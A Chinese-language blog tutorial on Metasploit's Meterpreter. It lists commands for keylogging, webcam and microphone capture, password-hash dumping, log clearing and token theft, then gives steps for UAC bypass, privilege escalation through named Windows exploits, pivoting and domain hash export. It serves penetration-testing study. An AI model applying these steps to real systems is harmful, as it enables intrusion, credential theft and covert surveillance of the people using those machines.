Jacob-liu
Jacob-liu

meterpreter使用详解

meterpreter使用详解

文章目录

  • meterpreter使用详解
    • 0 meterpreter简介
    • 1 meterpreter控制技巧总结
      • 1.1 命令详解
      • 1.2 sessions 控制命令
      • 1.3 meterpreter收集信息
        • 1.3.1 meterpreter 收集windows主机信息
          • 1.3.1.1 收集系统信息
          • 1.3.1.2 收集本地(域)用户信息
          • 1.3.1.3 收集当前用户信息
          • 1.3.1.4 收集主机所运行的服务
          • 1.3.1.5 查询主机所在地理位置
          • 1.3.1.6 查询arp信息
          • 1.3.1.7 枚举用户
          • 1.3.1.8 读取目标主机的WIFI密码
          • 1.3.1.9 监视
        • 1.3.2 meterpreter 收集linux主机信息
      • 1.4 meterpreter 提升权限常用模块
        • 1.4.1 Windows提权
          • 1.4.1.1 绕过UAC进行提权
          • 1.4.1.2 提高程序运行级别(runas)
          • 1.4.1.3 利用windows提权漏洞进行提权
          • 1.4.1.4 使用meterpreter命令提权
        • 1.4.2 Linux提权
      • 1.5 meterpreter控制逻辑总结
    • 2 POST 内网渗透总结
      • 2.1 内网穿透
        • 2.1.1 查询主机路由
        • 2.1.2 内网主机发现
        • 2.1.3 内网主机端口扫描
      • 2.2 后渗透攻击技巧
        • 2.2.3 查询域用户
        • 2.2.4 导出全域hash
        • 2.2.5 使用ipc通道访问域内用户
    • 3 感谢

0 meterpreter简介

Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。

Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。客户端可以用任何语言编写,但Metasploit具有全功能的Ruby客户端API。

Meterpreter如何工作?

  • 目标执行初始stager。这通常是bind,reverse,findtag,passivex等之一。
  • stager加载以Reflective为前缀的DLL。反射存根处理DLL的加载/注入。
  • Metepreter内核初始化,通过套接字建立TLS / 1.0链接并发送GET。Metasploit接收这个GET并配置客户端。
  • 最后,Meterpreter加载扩展。它将始终加载stdapi,并在模块提供管理权限时加载priv。所有这些扩展都使用TLV协议通过TLS / 1.0加载。

Meterpreter设计目标

隐身

  • Meterpreter完全驻留在内存中,并且不向磁盘写任何内容。
  • 由于Meterpreter将自身注入受损的进程并且可以轻松迁移到其他正在运行的进程,因此不会创建新进程。
  • 默认情况下,Meterpreter使用加密通信。
  • 所有这些提供有限的法医证据和对受害者机器的影响。

强大

  • Meterpreter采用通道化通信系统。
  • TLV协议有一些限制。

扩展

  • 功能可以在运行时扩充并通过网络加载。
  • 可以将新功能添加到Meterpreter,而无需重新构建它。

添加运行时功能

通过加载扩展将新功能添加到Meterpreter。

  • 客户端通过套接字上载DLL。
  • 在受害者上运行的服务器加载内存中的DLL并对其进行初始化。
  • 新的扩展将自己注册到服务器。
  • 攻击者机器上的客户端加载本地扩展API,现在可以调用扩展功能。

整个过程是无缝的,大约需要1秒钟才能完成。

1 meterpreter控制技巧总结

1.1 命令详解

以下为meterpreter帮助信息


Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         帮助文档
    background                将当前meterpreter隐藏到后台
    bg                        同上
    bgkill                    关闭后台运行的meterpreter脚本
    bglist                    列出正在运行的meterpreter脚本
    bgrun                     在后台运行一个meterpreter
    channel                   通信频道
    close                     关闭一个通信通道
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      关闭当前meterpreter会话
    get_timeouts              查询当前会话延迟时间
    guid                      获取当前会话的GUID
    help                      帮助文档
    info                      显示某个POST模块(后渗透模块)的帮助信息
    irb                       在当前会话打开交互式ruby shell
    load                      加载meterpreter扩展,常用mimikatz,kiwi
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   迁移会话到另一个进程
    pivot                     建立pivot代理,用于打穿内网
    pry                       Open the Pry debugger on the current session
    quit                      同exit
    read                      从某一个通信通道中读取数据
    resource                  执行在某个文件中存储的命令
    run                       执行一个meterpreter脚本或者post(后渗透)模块
    sessions                  快速切换会话
    set_timeouts              设置当前会话的延迟时间
    sleep                     强迫meterpreter静默,然后重新建立连接
    transport                 Change the current transport mechanism
    use                       load的别名
    uuid                      获取当前会话的uuid
    write                     向通信通道中写入数据


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           读取文件内容
    cd            更改工作目录
    checksum      检索文件校验和
    cp            复制
    dir           显示文件目录,同ls
    download      下载文件或目录
    edit          编辑文件
    getlwd        获取本地工作目录
    getwd         获取工作目录
    lcd           改变本地工作目录
    lls           显示本地文件目录
    lpwd          显示本地工作目录
    ls            显示文件目录
    mkdir         新建文件夹
    mv            剪切
    pwd           打印当前文件目录
    rm            删除文件
    rmdir         删除文件夹
    search        查找文件
    show_mount    列出所有挂载的硬盘
    upload        上传


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           显示主机arp缓存
    getproxy      显示当前代理设置
    ifconfig      显示网卡信息
    ipconfig      显示网卡信息
    netstat       显示网络连接
    portfwd       端口转发
    resolve       解析目标主机上的一组主机名,查找ip地址和主机地址对应关系
    route         显示、更改路由表


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       清空时间日志
    drop_token    Relinquishes any active impersonation token.
    execute       执行命令
    getenv        获取环境变量
    getpid        获取当前进程id
    getprivs      尝试获取更多权限
    getsid        获取当前进程的用户id
    getuid        获取uid
    kill          杀进程
    localtime     显示主机当地时间
    pgrep         通过进程名称过滤进程
    pkill         通过名称杀进程
    ps            列出正在运行的进程
    reboot        重启远程主机
    reg           修改远程主机注册表
    rev2self      Calls RevertToSelf() on the remote machine
    shell         打开远程主机shell
    shutdown      关闭远程主机
    steal_token   Attempts to steal an impersonation token from the target proce
ss
    suspend       挂起或唤醒进程
    sysinfo       获取主机系统信息


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   列出所有桌面
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   键盘监听
    keyscan_start  键盘监听
    keyscan_stop   键盘监听
    screenshot     截屏
    setdesktop     改变桌面
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     尝试提高权限


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      dump ash


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     操控文件时间戳

1.2 sessions 控制命令

msf exploit(windows/local/ms16_016_webdav) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

1.3 meterpreter收集信息

1.3.1 meterpreter 收集windows主机信息

1.3.1.1 收集系统信息

方法一:

shell
systeminfo

方法二:

sysinfo
1.3.1.2 收集本地(域)用户信息
shell
net user
net user /domain
1.3.1.3 收集当前用户信息
shell
whoami /all
1.3.1.4 收集主机所运行的服务
 run service_manager -l
1.3.1.5 查询主机所在地理位置
run post/multi/gather/wlan_geolocate
1.3.1.6 查询arp信息
arp
1.3.1.7 枚举用户
run post/windows/gather/enum_computers
1.3.1.8 读取目标主机的WIFI密码
run post/windows/wlan/wlan_profile
1.3.1.9 监视
run vnc
run sound_recorder
run webcam

1.3.2 meterpreter 收集linux主机信息

1.4 meterpreter 提升权限常用模块

1.4.1 Windows提权

1.4.1.1 绕过UAC进行提权

使用以下模块

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
1.4.1.2 提高程序运行级别(runas)

使用以下模块

exploit/windows/local/ask

该模块实际是使用更高权限运行程序,没有绕过UAC靶机会有响应,一般不使用。

1.4.1.3 利用windows提权漏洞进行提权

使用ms13_053,ms14_058,ms16_016,ms16_032等提权漏洞

对应漏洞补丁编号为

漏洞编号 CVE编号 补丁编号
ms13_053 CVE-2013-3129 KB2850851
ms14_058 CVE-2014-4148 KB3000061
ms16_016 CVE-2016-0051 KB3019215
ms16_032 CVE-2016-0099 KB3135174

漏洞利用对应模块(PS.msf版本为metasploit v4.17.24-dev)

漏洞编号 msf对应模块
ms13_053 exploit/windows/local/ms13_053_schlamperei
ms14_058 exploit/windows/local/ms14_058_track_popup_menu
ms16_016 exploit/windows/local/ms16_016_webdav
ms16_032 exploit/windows/local/ms16_032_secondary_logon_handle_privesc

以上是常用的提权模块,如果以上尝试均失败,请查看漏洞影响的系统版本,以及对应主机中是否安装了月度更新。

1.4.1.4 使用meterpreter命令提权
getsystem

1.4.2 Linux提权

1.5 meterpreter控制逻辑总结

meterpreter使用详解_第1张图片

2 POST 内网渗透总结

2.1 内网穿透

2.1.1 查询主机路由

run get_local_subnets
result:
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 1.22.124.0/255.255.255.0
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > info post/multi/manage/autoroute

       Name: Multi Manage Network Route via Meterpreter Session
     Module: post/multi/manage/autoroute
   Platform:
       Arch:
       Rank: Normal

Provided by:
  todb <[email protected]>
  Josh Hale "sn0wfa11" <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CMD      autoadd          yes       Specify the autoroute command (Accepted: a
dd, autoadd, print, delete, default)
  NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR a
s "/24"
  SESSION                   yes       The session to run this module on.
  SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

Description:
  This module manages session routing via an existing Meterpreter
  session. It enables other modules to 'pivot' through a compromised
  host when connecting to the named NETWORK and SUBMASK. Autoadd will
  search a session for valid subnets from the routing table and
  interface list then add routes to them. Default will add a default
  route so that all TCP/IP traffic not specified in the MSF routing
  table will be routed through the session when pivoting. See
  documentation for more 'info -d' and click 'Knowledge Base'



Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted:
add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR
as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

2.1.2 内网主机发现

扫描内网存活主机


run arp_scanner -r x.x.x.x/24

2.1.3 内网主机端口扫描

使用db_nmap

msf中使用的db_nmap实际上实际上使用nmap进行扫描生成xml格式文件,再倒入,因此db_nmap实际上就是nmap.

2.2 后渗透攻击技巧

2.2.3 查询域用户

run domain_list_gen

2.2.4 导出全域hash

hashdump

2.2.5 使用ipc通道访问域内用户

net use

3 感谢

Metasploit 中 Meterpreter 介绍

Metasploit入门系列(九)——Meterpreter(二)

你可能感兴趣的:(Tools)

  • ORB-SLAM3源码的学习:GeometricTools文件 PaLu-LvL 计算机视觉#ORB-SLAM3c++计算机视觉ubuntu人工智能学习
    前言GeometricTools提供了两种几何计算功能:1.计算两个关键帧之间的基础矩阵、2.通过三角化算法从两个视角恢复三维点。这部分功能在ORB-SLAM2中就已经介绍过了,这里不过多赘述。1.头文件GeometricTools.h除了计算基础矩阵和三角化恢复三维点外,头文件中还提供了两种用于比较矩阵的模板函数。第一个函数用于比较一个OpenCV矩阵和一个Eigen矩阵,第二个函数用于比较两个
  • 如何在不依赖函数调用功能的情况下结合工具与大型语言模型 Jason9510 语言模型人工智能
    当大型语言模型(LLM)原生不支持函数调用功能时,如何实现智能工具调度?本文通过自然语言解析+结构化输出控制的方法来实现。GitHub代码地址核心实现步骤定义工具函数使用@tool装饰器声明可调用工具:fromlangchain_core.toolsimporttool@tooldefmultiply_by_max(a:int,b:list[int])->int:"""将a乘以b列表中的最大值""
  • 前端高级面试题 阿芯爱编程 面试前端
    以下是一些高级前端面试题及答案:一、性能优化如何对大型前端项目进行性能剖析(profiling)?答案:使用ChromeDevTools中的Performance面板。可以记录页面加载和交互过程中的各种性能指标,如脚本执行时间、渲染时间、重绘和回流次数等。利用Lighthouse工具,它可以对网页进行全面的性能评估,包括加载性能、可访问性、最佳实践等方面,并给出优化建议。在代码中手动插入性能测量点
  • 通过WiFi连接adb调试 小刘学安卓 adbandroid
    通过WiFi连接adb调试解决cannotconnectto192.168.1.136:5555:由于目标计算机积极拒绝,无法连接。(10061)解决办法1(Windows下cmd环境执行)1.连接USB数据线,打开USB调试使用windows的“运行”命令行方式:(此方法需配置adb环境变量,也可直接进入adb工具目录执行\android-sdk-windows\platform-tools\)
  • 李志军老师操作系统实验 JHFeng_white&black ubuntulinux运维
    李志军老师操作系统实验_环境搭建准备工作宿主机:macOSMonterey12.2.1虚拟机:我选择的虚拟机是vmwarefusionpro(之前用的是免费版本的vmwarefusion,但是安装了ubuntu后发现始终安装不了vmwaretools)ubuntu18.04.6,这里附上我的网盘链接链接:https://pan.baidu.com/s/1bHpi-PWaqJSUAM_7BXPaLQ
  • Linux技巧:修复硬盘坏道 Hacker_Oldv linux运维服务器
    首先要验证硬盘是否有坏道,可以使用smartctl工具、sata-fsck命令以及Linuxsmartmontools软件包来查看硬盘状态。通过以下命令,可以检查硬盘硬件是否存在错误:$sudosmartctl-a/dev/sda如果检查结果显示出来有坏道,则可以尝试一下硬盘坏道修复方法:使用fdisk-l/dev/sda来检查硬盘坏道;如果显示出来接近空闲空间的坏道,可以使用下面的命令来修复:s
  • SAP ABAP 自动批量开关账期程序 OB52和MMPV IT 药师 SAP精品资源ABAP
    SAPABAP自动批量开关账期程序OB52和MMPV文章目录SAPABAP自动批量开关账期程序OB52和MMPV前言会计凭证过账期间物料凭证过账期间完整代码主程序ZTOOLSR0001自定义开物料账期函数ZTOOLSFM04_MMPV_JOB自定义公司代码表ZMASTERT0001前言
  • android studio build异常 JavaPub-rodert ERROR解决androidstudioandroidandroid-studio
    文章目录异常解决异常ERROR:FailedtoinstallthefollowingAndroidSDKpackagesassomelicenceshavenotbeenaccepted.platforms;android-28AndroidSDKPlatform28build-tools;28.0.2AndroidSDKBuild-Tools28.0.2Tobuildthisproject,a
  • Windows下文件复制到Linux系统 幸运的星竹 Linux命令操作
    http://wenku.baidu.com/link?url=4y0N6DqCAKkGZNHDnXy5IO1-2GQBLABko12DK-NoSm9mfVRvzdD30EkNQxzKqc1qUONACXoi4pVHIP_RygHKQHXd1zyQeejSDMTUs-calLS1、最好的方法:安装Vmtools,在vm中设置共享目录,即可进行共享。2、在linux中使用samba服务,这样可以与w
  • 鸿蒙next自动打包脚本 anthonyzhu harmonyos华为
    简要描述鸿蒙提供相应的打包流水线的官方文档鸿蒙next流水线官方描述提供的是单独的命令行工具包的打包流程IDE打包如果在打包机上安装了IDE,那就没有必要安装命令行工具包,只需要设置几个环境参数exportPATH=$PATH:/usr/local/bin/node;exportNODE_HOME=/Applications/DevEco-Studio.app/Contents/tools/nod
  • Android Studio tools:replace的使用 川峰 AndroidStudioAndroidtools:replace
    一般是项目中使用的第三方依赖库中的AndroidManifest.xml中跟当前app的AndroidManifest.xml中有重复的某些属性时AS会提示这个,其实你按照他的提示添加就可以解决了,这里只是记录一下。如三方的依赖中application标签添加了android:theme,android:label可以在当前app中添加:
  • FutureWarning: The pandas.core.datetools module is deprecated and will be removed in a future versio byteyoung 错误调试
    一直用pandas做数据分析,不过一直用的是老版本,还是0.20,今天做平稳性分析,出现了一个警告信息FutureWarning:Thepandas.core.datetoolsmoduleisdeprecatedandwillberemovedinafutureversion.Pleaseusethepandas.tseriesmoduleinstead.frompandas.coreimpor
  • Apache Cordova开发教程-入门基础 天马3798 教程系列整理apache
    1.ApacheCordova简介ApacheCordova介绍_coreapachecordovaapi.-CSDN博客2.ApacheCordovaCLI环境搭建,编译,启动ApacheCordova开发环境搭建(二)VSCode_vscodecordova框架-CSDN博客VSCode开发Cordova应用调试整理_cordovatools-CSDN博客3.ApacheCordovaAndr
  • bedtools:提取指定范围的vcf AnnyYoung 笔记生物信息软件数据分析centoslinux
    方法:bedtoolsintersect-ainput.vcf.gz-bwes.bed-header>input.wes.vcf参数:Tool:bedtoolsintersect(akaintersectBed)Version:v2.31.1Summary:Reportoverlapsbetweentwofeaturefiles.Usage:bedtoolsintersect[OPTIONS]-a
  • pl/sql使用部分整理 weixin_30718391 数据库
    在工作中使用pl/sql工具,总结一下常用操作,以便以后复习,也希望帮助朋友们熟悉pl/sql操作!1.pl/sql记住登录密码PL/SQLDeveloper->tools->Preferences->Oracle->LogonHistory,在右边界面的"Definition"中,"Storehistory"是默认勾选的,再勾选上"Storewithpassword",即可.重新登录的时候,从O
  • 什么是python uv,如何在windows上安装uv,基础的用法有哪些? 几道之旅 pythonuvwindows
    什么是PythonUV?UV是由Astral公司(Rust工具Ruff的开发者)推出的高性能Python包管理工具,基于Rust编写,旨在替代传统的pip和pip-tools。其核心优势在于极快的速度(比pip快10-100倍)、轻量级设计(仅几十MB)以及现代化的依赖管理(支持pyproject.toml和uv.lock文件)。UV集成了虚拟环境管理、Python版本控制、依赖解析等功能,目标是
  • 如何使用Jsoup获取动态加载的内容 小爬虫程序猿 java爬虫开发语言
    Jsoup是一个强大的Java库,用于解析HTML文档。然而,它主要用于解析静态HTML内容。对于动态加载的内容(如通过JavaScript生成的内容),Jsoup本身无法直接处理。不过,可以通过以下几种方法来解决这个问题:一、分析网络请求对于动态加载的内容,通常可以通过浏览器的开发者工具(如ChromeDevTools)来分析网络请求。找到加载动态内容的API接口后,可以直接使用Jsoup或Ht
  • KylinOS-Server定制制作属于自己的ISO镜像文件 太极淘 镜像制作centoslinux运维
    1、准备:镜像文件:Kylin-Server-10-SP1-Release-Build20-20210518-x86_64.iso然后安装在服务器上(用来定制ISO的服务器)根据自己的需求选择安装,我这里选择的是GUI安装2、安装制作ISO的工具yum-yinstallcreaterepomkisofsisomd5sumrsyncsquashfs-tools3、建立image-making-dir
  • 推荐:Next.js 企业级脚手架模板 潘俭渝Erik
    推荐:Next.js企业级脚手架模板next-enterpriseAnenterprise-gradeNext.jsboilerplateforhigh-performance,maintainableapps.PackedwithfeatureslikeTailwindCSS,TypeScript,ESLint,Prettier,testingtools,andmoretoacceleratey
  • Linux Python2.7离线安装request库 Citrus- centospython
    1.官网下载相应依赖包,涉及依赖包如下:现成打包好的:https://cloud.189.cn/t/v2m22i326zAb(访问码:j847)官网地址:https://pypi.org/setuptools-41.1.0.post1.tarpip-19.2.2.tar.gzcertifi-2019.9.11-py2.py3-none-any.whlchardet-3.0.4-py2.py3-no
  • Rtools44安装到D盘 hrply javalinux开发语言
    #RTOOLS44安装配置最新方法#安装Rtools44到非默认目录时,按照网上说的方法配置.Renviron会出现不论如何最终都无法被R识别的问题。试了各种方法,网上说的都是设置%RTOOLS40_PATH%系统环境变量,但实际上R-4.4.2并不读取系统变量(也可能改名字了,我没有细读)。首先,R-4.4.2以及Rstudio并不从系统环境变量里读取Rtools路径,不论你设置RTOOLS40
  • error: subprocess-exited-with-error 赛博曹操 BUG题解python开发语言idepycharm前端游戏程序
    error:subprocess-exited-with-error送你送一张GPTplus、deepseek-R1满血体验https://bbs.csdn.net/topics/619568415在使用pip安装Python包时,有时候会遇到error:subprocess-exited-with-error错误。这种错误通常是由于setuptools版本问题引起的。本文将介绍如何解决这一问题当
  • 怎样使用Fiddler的高级功能? zqzgng 测试工具开发工具
    Fiddler的高级功能1.HTTPS解密为了捕获HTTPS流量,你需要配置Fiddler进行HTTPS解密:步骤1:在Fiddler中,选择Tools>Options,打开选项窗口。步骤2:切换到HTTPS标签页,勾选DecryptHTTPStraffic。步骤3:根据提示安装Fiddler根证书,以便解密HTTPS流量。2.模拟网络延迟Fiddler允许你模拟网络环境,如增加延迟、限制带宽等:
  • CEF132 编译指南 MacOS 篇 - depot_tools 安装与配置 (四) 守城小轩 CEFchromedevtools浏览器开发chrome指纹浏览器
    1.引言在CEF132(ChromiumEmbeddedFramework)的编译过程中,depot_tools扮演着举足轻重的角色。这套由Chromium项目精心打造的脚本和工具集,专门用于获取、管理和更新Chromium及其相关项目(包括CEF)的源代码。借助depot_tools,开发者能够高效地同步最新的CEF源码,并进行项目构建。本篇将作为CEF132编译指南系列的第四篇,详细阐述如何在
  • python使用fontTools对较大的TTF字体文件进行缩包,仅挑出使用到的字符 csdn_li_1212 pythonpython游戏
    目前在开发网页小游戏,使用的ttf字体文件太大了足有十多M。公司一直有开发多语言游戏的习惯所以所有文本都会集中的一个配置文件中(方便翻译其他语言),所以就考虑挑出游戏使用到的字符,从而缩小ttf字体,减少初期进入游戏的下载量。网上搜到一篇参考链接测试了一下效果还是挺好的,12.8M>>0.6M我的python版本是3.10.6首先安装fontToolspipinstallfontTools完整脚本
  • 探索FontTools:字体处理的艺术与技术 纪亚钧
    探索FontTools:字体处理的艺术与技术项目地址:https://gitcode.com/gh_mirrors/fo/fonttools是一个开源的Python库,专为字体设计和排版专业人士打造,用于处理各种字体文件格式。这个项目由Adobe、Mozilla以及其他贡献者共同维护,其强大的功能和灵活的API使得它在字体工程领域中独树一帜。项目简介FontTools提供了一系列模块,涵盖了字体解
  • 字体工具库(fontTools): 深入理解和使用指南 常琚蕙
    字体工具库(fontTools):深入理解和使用指南项目地址:https://gitcode.com/gh_mirrors/fo/fonttools项目介绍字体工具库(fontTools)是一款用Python编写的强大字体处理库.它提供了一系列的功能,包括读写各种格式的字体文件,如TrueType,OpenType,AdobeFontMetrics和部分支持Type1及Mac特定格式.使用font
  • Dockerfile RUN pip install psycopg2 Error: pg_config executable not found. 罗锦天 pythondockeralpinepythondockerlinux
    Error:pg_configexecutablenotfound.Dockerfile在python:alpine镜像中执行pipinstallpsycopg2安装psycopg2模块时出错错误信息ERROR:Commanderroredoutwithexitstatus1:command:/usr/local/bin/python-c'importsys,setuptools,tokenize
  • Chrome 130 版本开发者工具(DevTools)更新内容
    Chrome130版本开发者工具(DevTools)更新内容一、网络(Network)面板更新1.重新定义网络过滤器网络面板获新增了一些过滤条件,这些过滤条件是根据反馈重新设计的,特定于类型的过滤条件保持不变,即在简洁的多选栏中显示一组标记。可以通过Cmd/Ctrl键+点击来多选类型过滤条件。为了简化界面,我们将与隐藏、屏蔽和第三方相关的复选框移到了下拉列表下方。该列表包含一个数字,表示下拉菜单下
  • Python pip命令 weixin_34050427 python
    一、简介pip是一个安装和管理Python包的工具,是easy_install的一个替换品。distribute是setuptools的取代(Setuptools包后期不再维护了),pip是easy_install的取代。pip的安装需要setuptools或者distribute,如果你使用的是Python3.x那么就只能使用distribute因为Python3.x不支持setuptools。
  • Java 并发包之线程池和原子计数 lijingyao8206 Java计数ThreadPool并发包java线程池
    对于大数据量关联的业务处理逻辑,比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式,并且可以提高线程利用率,并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。     这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
  • java编程思想 抽象类和接口 百合不是茶 java抽象类接口
    接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持   1 ,抽象类 :  如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错)   抽象方法 : 在方法中仅有声明而没有方法体    package com.wj.Interface;
  • [房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
           随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间...        所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产     &nb
  • 数组队列总结 沐刃青蛟 数组队列
          数组队列是一种大小可以改变,类型没有定死的类似数组的工具。不过与数组相比,它更具有灵活性。因为它不但不用担心越界问题,而且因为泛型(类似c++中模板的东西)的存在而支持各种类型。      以下是数组队列的功能实现代码:   import List.Student; public class
  • Oracle存储过程无法编译的解决方法 IT独行者 oracle存储过程 
    今天同事修改Oracle存储过程又导致2个过程无法被编译,流程规范上的东西,Dave 这里不多说,看看怎么解决问题。   1.     查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
  • 重装系统之后oracle恢复 文强chu oracle
    前几天正在使用电脑,没有暂停oracle的各种服务。 突然win8.1系统奔溃,无法修复,开机时系统 提示正在搜集错误信息,然后再开机,再提示的无限循环中。 无耐我拿出系统u盘 准备重装系统,没想到竟然无法从u盘引导成功。 晚上到外面早了一家修电脑店,让人家给装了个系统,并且那哥们在我没反应过来的时候, 直接把我的c盘给格式化了 并且清理了注册表,再装系统。 然后的结果就是我的oracl
  • python学习二( 一些基础语法) 小桔子 pthon基础语法
    紧接着把!昨天没看继续看django 官方教程,学了下python的基本语法 与c类语言还是有些小差别: 1.ptyhon的源文件以UTF-8编码格式 2. /   除 结果浮点型 //  除 结果整形 %   除 取余数 *   乘 **  乘方 eg 5**2 结果是5的2次方25 _&
  • svn 常用命令 aichenglong SVN版本回退
    1 svn回退版本   1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别:   revert this version:表示回退到当前版本(该版本后的版本全部作废)   revert chanages from this versio
  • 某小公司面试归来 alafqq 面试
    先填单子,还要写笔试题,我以时间为急,拒绝了它。。时间宝贵。 老拿这些对付毕业生的东东来吓唬我。。 面试官很刁难,问了几个问题,记录下; 1,包的范围。。。public,private,protect. --悲剧了 2,hashcode方法和equals方法的区别。谁覆盖谁.结果,他说我说反了。 3,最恶心的一道题,抽象类继承抽象类吗?(察,一般它都是被继承的啊) 4,stru
  • 动态数组的存储速度比较 集合框架 百合不是茶 集合框架
    集合框架: 自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
  • 用JS实现一个JS对象,对象里有两个属性一个方法 bijian1013 js对象
    <html> <head> </head> <body> 用js代码实现一个js对象,对象里有两个属性,一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
  • 探索JUnit4扩展:使用Rule bijian1013 java单元测试JUnitRule
            在上一篇文章中,讨论了使用Runner扩展JUnit4的方式,即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule       &n
  • [Gson一]非泛型POJO对象的反序列化 bit1129 POJO
    当要将JSON数据串反序列化自身为非泛型的POJO时,使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种: 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段,例如泛型集合或者泛型类 Data类 a.不是泛型类, b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO    
  • 【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
    0.Kafka服务器的配置 一个Broker, 一个Topic Topic中只有一个Partition()   1. Producer: package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
  • lsyncd实时同步搭建指南——取代rsync+inotify ronin47
    1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案,原先使用的是 inotify + rsync,但随着文件数量的增大到100W+,目录下的文件列表就达20M,在网络状况不佳或者限速的情况下,变更的文件可能10来个才几M,却因此要发送的文件列表就达20M,严重减低的带宽的使用效率以及同步效率;更为要紧的是,加入inotify
  • java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
    public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时,肯定是查找树 *2.只有两个结点时,肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
  • MySQL的sum函数返回的类型 bylijinnan javaspringsqlmysqljdbc
    今天项目切换数据库时,出错 访问数据库的代码大概是这样: String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
  • java设计模式之单例模式 chicony java设计模式
    在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的:   作为对象的创建模式,单例模式确保某一个类只有一个实例,而且自行实例化并向整个系统提供这个实例。这个类称为单例类。 单例模式的结构   单例模式的特点: 单例类只能有一个实例。 单例类必须自己创建自己的唯一实例。 单例类必须给所有其他对象提供这一实例。   饿汉式单例类   publ
  • javascript取当月最后一天 ctrain JavaScript
    <!--javascript取当月最后一天--> <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
  • linux tune2fs命令详解 daizj linuxtune2fs查看系统文件块信息
